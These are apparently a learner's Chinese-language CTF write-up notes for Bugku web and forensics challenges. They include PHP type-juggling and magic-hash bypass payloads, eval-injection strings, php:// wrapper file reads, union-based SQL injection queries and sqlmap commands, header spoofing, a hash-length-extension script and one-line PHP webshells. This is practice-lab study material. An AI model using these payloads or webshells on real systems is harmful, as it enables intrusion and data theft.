1.web2 听说聪明的人都能找到答案 http: CTRL + u 查看源代码
2.计算器 http: 改一下字符输入长度的限制
3.web基础$_GET http: ?var=val
4.web基础$_POST http: 直接用BurpSuite改包,注意先改为POST request
5.矛盾 http: $num = $_GET['num']; if(!is_numeric($num)) { echo $num; if($num == 1) echo 'flag{**********}'; } 此处 == 为弱类型判断,num = 1e ,num == 1
6.web3 flag就在这里快来找找吧 http: 直接查看源码,得& & 扔到 Burp 解码试试,解为html得flag
7.域名解析 听说把 flag.bugku.com 解析到123.206.87.240 就能拿到flag 两种办法:1.直接改本机 host 文件 2.访问时将请求头中的 host 改为flag.bugku.com 然而我两种办法都失败了,显示域名没备案,哈哈哈
8.你必须让他停下 http: 页面不断的自动刷新,用Burp拦截,一张图一张图看,源代码中蕴含了 flag
9.本地包含 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> show_source() 对文件进行语法高亮 hello=1);show_source('flag.php');var_dump( 最终解释为: var_dump(1);show_source('flag.php');var_dump(show_source(__FILE__);
10.变量1 flag In the variable ! <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?>
通过 include 或 require 语句,可以将 PHP 文件的内容插入另一个 PHP 文件
两个 ^表示开始字符串 $表示结束字符串 \w表示包含【a-z,A-Z, _ , 0-9】 +表示一个或者多个\w
var_dump()显示一个或多个表达式的结构信息,包括表达式的类型与值。 数组将递归展开值,通过缩进显示其结构
eval()存在命令执行漏洞,我们是想查看flag1.php中的flag, 首先想到的是本地包含漏洞,查看源码,或者上传一句话木马等思路 但是条件判断加了正则表达式判断,过滤了括号和引号等字符。 PHP 在 $GLOBALS[index] 数组中存储了所有全局变量,数组的键值为变量名
$$args = $($args)
$$ --> 可变变量,允许动态改变一个变量名称 $name = "trans"; $trans = "You can see me"; echo $name.<br>; echo $$name;
------------ 结果: trans You can see me
11.web5 JSPFUCK??????答案格式CTF{**} http: 查看源代码可得:([][(![]+[])[+[]] 这种加密过后的 js 代码,直接扔到 console 跑一下就出来
12.头等舱 老办法,先看源代码,源代码还是啥也没有,看看请求头,找到了
13.网站被黑 http: 这个题没技术含量但是实战中经常遇到 扫一下后台,找到后门,Burp 爆破就看到了
14.管理员系统 特别突出的是 非本地IP访问,直接改个 X-Forwarded-For:,然后再爆破 X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。 它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的详细介绍。 标准格式如下:X-Forwarded-For: client1, proxy1, proxy2 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer, 告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理
15.web4 var p1 = ----; var p2 = ----; eval(unescape(p1) + unescape('%35%34%61%61%32' + p2)); function checkSubmit() { var a = document.getElementById("password"); if("undefined"!=typeof a) { if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) return !0; alert("Error"); a.focus(); return !1; } } document.getElementById("levelQuest").onsubmit=checkSubmit; 明显发现有一段被 base64 加密过,解码可得
16.输入密码查看flag http: 目录提示使用爆破,5位数密码??? 纯数字!!!
17.点击一百万次 var clicks=0 $(function() { $("#cookie") .mousedown(function() { $(this).width('350px').height('350px'); }) .mouseup(function() { $(this).width('375px').height('375px'); clicks++; $("#clickcount").text(clicks); if(clicks >= 1000000){ var form = $('<form action="" method="post">' + '<input type="text" name="clicks" value="' + clicks + '" hidden/>' + '</form>'); $('body').append(form); form.submit(); } }); });
观察得,若clicks >= 1000000 则执行下面的提交表单, 索性直接 post 好了
18.过狗一句话 <?php $poc = "a#s#s#e#r#t"; $poc_1 = explode("#",$poc); $poc_2 = $poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> bool assert ( mixed $assertion [, Throwable $exception ] ) http: print_r() 函数用于打印变量,以更容易理解的形式展示 scandir(directory,sorting_order,context) 函数返回指定目录中的文件和目录的数组 print_r(scandir('./'))
<?php $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); }else{ echo "you are not admin ! "; } ?> 这个题遇到很多骚办法,暂时还不会做 博客 :https: https: php 伪协议 php: php: <?php class Read{ public $file; }
$a = new Read(); $a->file = "f1a9.php"; $a = serialize($a); print_r($a); ?> <?php class Read{ public $file; public function __toString(){ if(isset($this->file)){ echo file_get_contents($this->file); } return "__toString was called!"; } } ?>
<?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ exit(); }else{ include($file); $pass = unserialize($pass); echo $pass; } }else{ echo "you are not admin ! "; } ?>
<?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not be uname.'; else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) die('Flag: '.$flag); else print 'sorry!'; } ?> 先将 id URL编码 %6d%61%72%67%69%6e 再用数组绕过sha1()
linux基础问题 得到一个压缩包,win下打不开,扔到kali解压后发现一个flag的文件, 改权限777,cat强行查看,发现flag,不过本意好像不是这样 strings 命令(此命令相当牛逼,以后再仔细学)
题目给的是 conf.bin 文件,.bin 相当于一个万能后缀,无法直接确定 打开看一下是二进制文件,题目强调的是宽带信息泄露,flag{宽带用户名} 网上提示了一个工具 Routerpassview
var net = require('net'); flag='fake_flag'; var server = net.createServer( function(socket) { socket.on('data', (data) => { ok = true; arr = data.toString().split(' '); arr = arr.map(Number); if (arr.length != 5) ok = false; arr1 = arr.slice(0); arr1.sort(); for (var i=0; i<4; i++) if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127) ok = false; arr2 = []; for (var i=0; i<4; i++) arr2.push(arr1[i] + arr1[i+1]); val = 0; for (var i=0; i<4; i++) val = val * 0x100 + arr2[i]; if (val != 0x23332333) ok = false; if (ok) socket.write(flag+'\n'); else socket.write('nope\n'); }); } ); HOST = '' PORT = 8082 server.listen(PORT, HOST);
这里还要用到 netcat 简称 nc,又涨了波姿势
<?php $flag='xxx'; extract($_GET); if(isset($shiyan)){ $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; } else{ echo'Oh.no'; } } ?> extract(array[,extract_rules,prefix)]
<?php $flag = "flag{xxxxx}"; if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) die('Flag: '.$flag); else print 'No'; } ?> 如果 str1 小于 str2 返回 < 0;如果大于返回 > 0;如果相等,返回 0。
<?php if(eregi("hackerDJ",$_GET[id])) { echo("not allowed!"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "hackerDJ"){ echo "Access granted!"; echo "flag"; } ?> int ereg(string pattern, string string, array [regs]); 区分大小写 int eregi(string $pattern, string $string [, array &$regs]) 不区分大小写的正则表达式匹配 题面已经给了思路,将 hackerDJ 进行二次 url 编码即可绕过
<?php error_reporting(0); $flag = 'flag{test}'; if (isset($_GET['username']) and isset($_GET['password'])) { if ($_GET['username'] == $_GET['password']) print 'Your password can not be your username.'; else if (md5($_GET['username']) === md5($_GET['password'])) die('Flag: '.$flag); else print 'Invalid password'; } ?> 数组大法好,直接 username[]&password[]=1又轻松绕过 md5() 原理:md5() 不能处理数组,md5(数组) 会返回 null
<?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) echo 'You password must be alphanumeric'; else if (strpos ($_GET['password'], '--') !== FALSE) die('Flag: ' . $flag); else echo 'Invalid password'; } ?> 数组又能直接绕过?? => password[]=1 原理: ereg() 只能处理字符,传数组将返回 null, 三个等号的时候不会进行类型转换,所以 null!==false strpos() 的参数同样不能是数组,返回依旧是 null,同上
%00 截断:ereg()可以进行%00截断,这样就能绕开正则匹配 => password=1%00--
<?php $temp = $_GET['password']; is_numeric($temp) ? die("no numeric") : NULL; if($temp>1336){ echo $flag; ?> 数组又能直接绕过?? is_numeric()判断变量是否为数字或数字字符串 password=1445%00 / password=1445%20
<?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo ""; var_dump($_GET['password']); var_dump(sha1($_GET['name'])); var_dump(sha1($_GET['password'])); if ($_GET['name'] == $_GET['password']) echo 'Your password can not be your name!'; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo 'Invalid password.'; } else echo 'Login first!'; ?> sha1() 计算字符串的散列值 数组又能直接绕过?? sha1() 函数无法处理数组类型,将报错并返回false,false === false条件成立
<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "flag{*}"; } else { echo "false!!!"; } } else{ echo "please input a"; } ?> PHP 在处理哈希字符串时,会利用 != / == 来对其进行比较,它把每个以“0e”的哈希值都解释为0。 如果两个不同的密码经过哈希以后,哈希值都是以“0e"开头的话,PHP将认为这两个哈希值相同。
常见的payload: QNKCDZO 0e830400451993494058024219903391
s155964671a 0e342768416822451524974117254469
s214587387a 0e848240448830537924465865611904
s878926199a 0e545993274517709034328855841020
s1091221200a 0e940624217856561557816327384675
s1885207154a 0e509367213418206700842008763514
s1836677006a 0e481036490867661113260034900752
s1184209335a 0e072485820392773389523109082030
s1665632922a 0e731198061491163073197128363787
s1502113478a 0e861580163291561247404381396064
s532378020a 0e220463095855511507588041205815
# 十六进制与数字比较 <?php error_reporting(0); function noother_says_correct($temp) { $flag = 'flag{test}'; $one = ord('1'); //ord() 返回字符的 ASCII 码值 $nine = ord('9'); $number = '3735929054'; for ($i = 0; $i < strlen($number); $i++) { $digit = ord($temp{$i}); if (($digit >= $one) && ($digit <= $nine)) return "flase"; } if($number == $temp) return $flag; } $temp = $_GET['password']; echo noother_says_correct($temp); ?> 转十六进制 0xdeadc0de 绕过,别忘了加 0x
# strpos数组绕过 <?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else echo '骚年,继续努力吧啊~'; } ?> 数组又能直接绕过?? ctf[]={#BIUBIUbiu}
# ereg正则%00截断 <?php $flag = "xxx"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo 'You password must be alphanumeric'; } else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999) { if (strpos ($_GET['password'], '*-*') !== FALSE) die('Flag: ' . $flag); else echo('*-* have not been found'); } else echo 'Invalid password'; } ?> 1.数组绕过:password[] 2.%00截断,再加上科学计数法 => password=1e9%00*-*
# 数字验证正则绕过 <?php error_reporting(0); $flag = 'flag{test}'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)){ echo 'flag'; exit; } while (TRUE) { $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'; if (6 > preg_match_all($reg, $password, $arr)) break; $c = 0; $ps = array('punct', 'digit', 'upper', 'lower'); //[[:punct:]] 任何标点符号 [[:digit:]] 任何数字 [[:upper:]] 任何大写字母 [[:lower:]] 任何小写字母 foreach ($ps as $pt) { if (preg_match("/[[:$pt:]]+/", $password)) $c += 1; } if ($c < 3) break; //>=3,必须包含四种类型三种与三种以上 if ("42" == $password) echo $flag; else echo 'Wrong password'; exit; } } ?> 直接password=就出答案了???我???
# 字符?正则? <?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ die('key is: '.$key); } ?> 单纯的考正则表达式,只要id成功匹配就会出flag,注意!!!最后一个是匹配任意标点符号!!! 定界符:/和/(除了\和字母数字,其它的只要是成对出现都可以看做定界符,比如##、!!之类的) /i 表示忽略大小写 id=key0key4434key:/a/aakeyb. 忘记了最后那个标点符号,差点怀疑人生
# 程序员本地网站 直接在请求头里添加 X-Forwarded-For:
# 你从哪里来 are you from google? 将 refer 头修改为 https://www.google.com www.google.com 都不行 http://www.google.com 都不行 :)
# login1(SKCTF) hint:SQL约束攻击 先注册 user:admin 1 passwd:Abc123 然后 用admin,Abc123也能登录上了 [约束攻击详解](https://www.freebuf.com/articles/web/124537.html)
# md5 collision(NUPT_CTF) 题目是MD5碰撞,直接传一个MD5以0e开头的过去
# 秋名山老司机 亲请在2s内计算老司机的车速是多少 每次显示一些随机的大数相加减 我想到了py直接提交请求,然而自己独立写不出来 import requests import re url = '' s = requests.Session() source = s.get(url) expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group() result = eval(expression) post = {'value': result} print(s.post(url, data = post).text) 必须利用会话对象 Session(),否则提交结果的时候,页面又重新生成一个新的表达式 利用正则表达式截取响应内容中的算术表达式。首先引入 re 模块,其次用 search() 匹配算术表达式,匹配成功后用 group() 返回算术表达式的字符串。 获得算术表达式的字符串后,直接利用 Python 的內建方法 eval() 来计算出结果,简单、暴力、快捷。
# web8 txt???? <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) echo "<p>This is flag:" ." $flag</p>"; else echo "<p>sorry!</p>"; } ?> empty() 以下情况将返回TRUE "" (空字符串) 0 (作为整数的0) 0.0 (作为浮点数的0) "0" (作为字符串的0) NULL FALSE array() (一个空数组) $var; (一个声明了,但是没有值的变量) 单个参数的extract()自然想到变量覆盖,然而$ac又不能为空 扫了后台扫了个2.php,又提示txt,ac=txt& fn=2.php,结果没卵用,哈哈 试了好几次后选择看writeup 1.ac=flags& fn=flag.txt,这个想法真是脑洞打开 2.利用伪协议读取post,妙极了 ac=233 & fn=php://input 再post一个233,齐活儿
# 前女友(SKCTF) <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v3, $flag)){ echo $flag; } } } ?> md5碰撞,数组绕过strcmp(),做完了
# 速度要快 我感觉你得快点!!! 查看源码 => <!-- OK ,now you have to post the margin what you find --> 找啊找啊,响应头里面发现了一个 flag 键名 刷新一下还会变,flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTmpNek56RXo= 那就上py脚本搞吧,注意建立会话对象 session(),否则已提交,flag又变了
import requests import base64
url = '' req = requests.session() flag = req.get(url).headers['flag'] flag = base64.b64decode(flag) print(flag) flag = flag.decode() # 防止split()报错 flag = base64.b64decode(flag.split(':')[1]) # 解码两次才变成数值 print(flag) data = {'margin':flag} print(req.post(url,data).content) # 此处为了看得方便可继续解码,不过没必要
// 一定要养成手动保存的好习惯,东西丢了还是很伤心的,又要重写
# cookies欺骗 得到这么一个字符串: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry 还有一个地址:index.php?line=& filename=a2V5cy50eHQ= (keys.txt) 直接查看keys.txt,发现还是这么一段乱七八糟的字符串 上面那个又向一个文件包含,filename传入的还是一个base64编码,看看 aW5kZXgucGhw (index.php) 乍一看还是什么都没有,调整一下line的参数,有点东西了,一点一点扒下来 <?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); $file_list = array('0' =>'keys.txt','1' =>'index.php',); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ $file_list[2]='keys.php'; } if(in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; } ?> 此时改一下 cookies,margin=margin,游戏结束
# flag在index里 既然说flag在index里,看一下index源码,?file=php://filter/read=convert.base64-encode/resource=index.php PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
解码一下 <html> <title>Bugku-ctf</title>
<?php error_reporting(0); if(!$_GET){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag:flag{edulcni_elif_lacol_si_siht} ?> </html>
# 成绩单 发现一个用 post 传 id 的输入框,注入题 -1' union select 1,2,3,database()# -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# -1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467# // 这里用16进制绕过一下 -1' union select 1,2,3,skctf_flag from fl4g#
sqlmap 也能跑出来,牛 sqlmap -u URL --data="id=1" [11:01:58] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 发现后台数据库是 mysql
列举所有数据库 sqlmap -u URL --data="id=1" --dbs available databases [2]: [*] information_schema [*] skctf_flag
爆出所有表 sqlmap -u URL --data="id=1" -D skctf_flag --tables Database: skctf_flag [2 tables] +------+ | fl4g | | sc | +------+
列出内容 sqlmap -u --data="id=1" -T fl4g --dump 也可以选择全弄出来:sqlmap -u --data="id=1" -D skctf_flag --dump Database: skctf_flag Table: fl4g [1 entry] +---------------------------------+ | skctf_flag | +---------------------------------+ | BUGKU{Sql_INJECT0N_4813drd8hz4} | +---------------------------------+
# 备份是个好习惯 d41d8cd98f00b204e9800998ecf8427e d41d8cd98f00b204e9800998ecf8427e 提示提到了备份,应该是备份文件源码泄漏一类的,用脚本跑下后台有没有源码 {工具在 F/CTF_tools/源码泄露} 得到 index.php.bak <?php include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?'); $str = substr($str,1); $str = str_replace('key','',$str); parse_str($str); echo md5($key1); echo md5($key2); if(md5($key1) == md5($key2) && $key1 !== $key2){ echo $flag."取得flag"; } 有个替换性的过滤,用 kekeyy 就能绕过 分析源码,有个 parse_str(),此函数与 extract() 差不多,将关联数组中的元素与变量联系起来 那么就可以这样传值进去,kekeyy1 & kekeyy2[] MD5函数无法处理数组,于是可以用 kekeyy1[]=33 & kekeyy2[]=44 进行绕过 或者直接 MD5碰撞 ?>
# never give up 查看源码,发现一个小注释:1p.html 一打开就跳转到其他页面,拿burp抓一下,发现如下信息
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); 然后一路解码,得到代码 <script>window.location.href='http://www.bugku.com';</script> <!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->
";if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')){ echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) require("f4l2a3g.txt"); else print "never never never give up !!!"; ?> 既然是 require(f4l2a3g.txt) 直接看看这个文件?flag就直接能看到了
# 细心 出现一个假的404页面,源代码里面也啥都没有,尝试扫扫后台,发现 robots.txt 打开它,发现一个 resusl.php 文件,再进去看一下,提示 _GET['x'] == password 提交 x = admin ,结果真中了,如果还没出来,只能想办法爆破了
# flag.php 有个登录框,点 login 没反应,题名叫 flag.php,肯定有这个文件,进去看一下 啥都没有。上面提交之所以没反应,是因为 action=#,之前猜测直接给flag.php post user & password 的值,还是没卵用,试试post hint?,还是没用,最终看别人的解释是 在flagphp处get hint=1,直接出源码了??还是要多尝试,反正就这么多套路
<?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])) show_source(__FILE__); elseif (unserialize($cookie) === "$KEY") echo "$flag"; else { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Login</title> <link rel="stylesheet" href="admin.css" type="text/css"> </head> <body> <br> <div class="container" align="center"> <form method="POST" action=" <p><input name="user" type="text" placeholder="Username"></p> <p><input name="password" type="password" placeholder="Password"></p> <p><input value="Login" type="button"/></p> </form> </div> </body> </html>
<?php } $KEY='ISecer:www.isecer.com'; ?>
打算直接提交ISecer = $KEY 的反序列化,后面发现在此之前$KEY都没有被定义,所以KEY是空的, 只需提交空的序列化上去就可以了 <?php $cookie = serialize("$key"); print_r($cookie); ?> 这样构造一下,就得到了 s:0:""; 但是注意;(分号)在cookie中不会被正确的上传到服务器,构造URL编码 ;的URL编码为%3B 所以 cookie:ISecer=s:0:""%3B
function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = explode(',', $ip); return $ip_arr[0]; }
$host="localhost"; $user=""; $pass=""; $db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp(); echo 'your ip is :'.$ip; $sql="insert into client_ip (ip) values ('$ip')"; mysql_query($sql);
又是一个注入题,常规的 and 1=1 啥的都被过滤掉了,多积累姿势
之前还以为要传马,后面查wp发现是我想多了,只要成功传php文件就能拿到flag 顺便学习下文件上传 Content-Type: Multipart/form-data + .php5 ???
直接伪协议试试:php: => NAIVE! 查看源码发现 upload.php => 文件上传
wp上写的是.php;.jpg,我的直接传个 .gif,然后利用本身的 file=xxx,查看了所传图片,命令就被执行了 <script language=php> system("ls")</script> about hello.php index.php this_is_th3_F14g_154f65sd4g35f4d6f43.txt upload upload.php 还有个思路,传马之后,菜刀连接,此处不用改后缀名也能解析?? <script language=php>eval($_POST['A'])</script>
<?php function encrypt($data,$key) { $key = md5('ISCC'); $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) {
$char .= $key[$x % $klen]; $x += 1; } for ($i=0; $i < $len; $i++) { $str .= chr((ord($data[$i]+ $key[$i % $klen]) % 128); } return base64_encode($str); } ?>
import hashlib import base64
key = hashlib.md5("ISCC".encode('utf-8')).hexdigest() base_64 = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=" base_64 = base64.b64decode(base_64) data_len = len(base_64)
str_ = "" for i in range(len(base_64)): str_ += chr((base_64[i]-ord(key[i%len(key)]))%128) print(str_)
这个题有点坑,我把源码都弄下来后仔细的看能不能绕过,结果看下别人的wp,直接有一个flag.php,我之前没扫出来。 这教会了我一个道理,先扫flag,flag.php已加入字典,以后就能扫出来了。
下面的安全性已经非常高了,后缀被控死 upload.php
<?php include 'common.php';
if(isset($_POST['submit']) && isset($_FILES['image'])) { $fn = $_FILES['image']['tmp_name']; $ft = $_FILES['image']['type'];
if(!is_uploaded_file($fn)) { fatal('uploaded file corrupted'); }
$array = array('image/png'); if(!in_array($ft,$array)){ fatal("Sorry, only PNG files are allowed."); }
$imagekey = create_image_key();
move_uploaded_file($fn, "uploads/$imagekey.png");
header("Location: ?op=show&imagekey=$imagekey"); ?>
<?php include 'common.php';
if(empty($_GET['imagekey'])) { header('Location: ?op=home'); exit(); }
$imagekey = $_GET['imagekey']; $im = load_image($imagekey);
$w = imagesx($im); $h = imagesy($im); if($w > MAX_IM_SIZE || $h > MAX_IM_SIZE) fatal("Invalid image dimensions."); ?> <center> <div class="article"> <h2></h2> <p><img src="uploads/<?=$imagekey;?>.png" /> <div> <a href="uploads/<?=$imagekey;?>.png">View saved image</a> </div> </div> </center>
<?php if(!defined('FROM_INDEX')) die();
define('MAX_IM_SIZE', 100);
function create_image_key() { return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand()); }
function load_image($imagekey) { if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) { fatal('Invalid image key.'); }
$im = imagecreatefrompng("uploads/{$imagekey}.png"); if(!$im) { fatal('Failed to load image.'); } return $im; } stream_wrapper_unregister ("zip"); ?>
EIS2018题感觉不错加上了 http: https: https: https: <?php class TinySSI { public function parse($content) { $parsed = $connect; $parsed = preg_replace_callback('|<!--#include virtual="(.*?)"(\s)*-->|', function ($matches) { $output = file_get_contents("./" . $matches[1]); return $output; }, $parsed); return $parsed; } } ?> <?php echo "Flag is in the file 'flag' in this path\n"; require_once('ssi.php'); $parser = new TinySSI; if(isset($_GET['name'])){ echo("Your name is " . $parser->parse($_GET['name'])); exit(); } ?> <!--
全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,%
看了几个数据流,发现了一下内容 flag.tar.gz2016-06-27 08:45:382030666 log.txt2015-06-03 12:18:4615020666 news.asp2014-06-27 03:44:243650666 SaveFile.asp2014-06-27 05:45:088220666 testNull.php2014-07-17 08:06:14160666 upload.html2014-06-27 05:27:463640666 webshell.php2014-07-21 05:52:36180666 xiaoma.asp;.jpg2014-07-04 08:17:1813120666
猜测 caidao.pcapng 包含了其他文件 使用 binwalk 查看一下 7747 0x1E43 gzip compressed data, from Unix, last modified: 2016-06-27 08:44:39
提取 dd if=caidao.pcapng of=1.gzip skip=7747 bs=1
解压 ➜ CTF tar -xvf 1.gzip gzip: stdin: decompression OK, trailing garbage ignored flag/ flag/flag.txt tar: Child returned status 2 tar: Error is not recoverable: exiting now
打开一看真的是很多数据包,看一下http,没有。 题目提示,寻找 getshell 流。一般的 getshell 流的 TCP 的报文中很可能包含 command 这个字段, 我们可以通过 【协议 contains "内容"】 来查找 getshell 流 tcp contains "command" 看到几个tcp 再追踪tcp流 C:\>type s4cr4t.txt type s4cr4t.txt Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== C:\>shutdown -r -t 100 -m "Stupid Manager!" shutdown -r -t 100 -m "Stupid Manager!"
重点学习 zio import hashpumpy import urllib from urlparse import parse_qsl from zio import * import re, string, itertools io = zio(('', 8888)) io.read_until('Command: ') io.writeline('2') io.writeline('9') io.read_until('Your order:\n') c = io.readline('\n') d = parse_qsl(c) hash = d[3][1].strip() pr = 'product=Flag&price=99999×tamp=%s'%(d[2][1]) print hash, pr for i in range(8,32): ret = hashpumpy.hashpump(hash, pr, '&price=233', i) order = '%s&sign=%s' %(ret[1], ret[0]) io.writeline('3') io.read_until('\n') io.writeline(order) io.read_until('Command: ')
